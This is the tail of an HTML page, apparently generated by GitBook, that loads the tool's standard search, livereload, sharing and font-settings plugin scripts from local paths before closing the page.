        <script src="gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

